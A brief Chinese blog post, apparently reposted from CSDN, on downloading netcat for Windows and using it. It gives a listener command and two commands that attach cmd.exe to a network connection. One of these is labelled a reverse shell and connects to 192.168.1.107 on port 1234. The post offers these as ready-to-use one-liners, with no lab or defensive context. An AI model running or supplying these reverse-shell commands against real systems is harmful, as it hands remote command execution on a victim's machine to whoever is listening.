nc(netcat)安装和使用

nc(netcat)使用

1.安装nc

下载地址:https://eternallybored.org/misc/netcat/

火狐截图_2020-04-08T15-53-09.401Z

添加到环境变量就可以直接用了

附:

nc
客户端:nc.exe -l -vv -p 1234(端口)
服务端:nc –t –e cmd.exe ip port

nc回连shell
nc -d -t -e cmd.exe 192.168.1.107 1234

具体使用方法:

https://zhuanlan.zhihu.com/p/83959309

https://www.oschina.net/translate/linux-netcat-command

发布了28 篇原创文章 · 获赞 23 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/weixin_44823747/article/details/105400617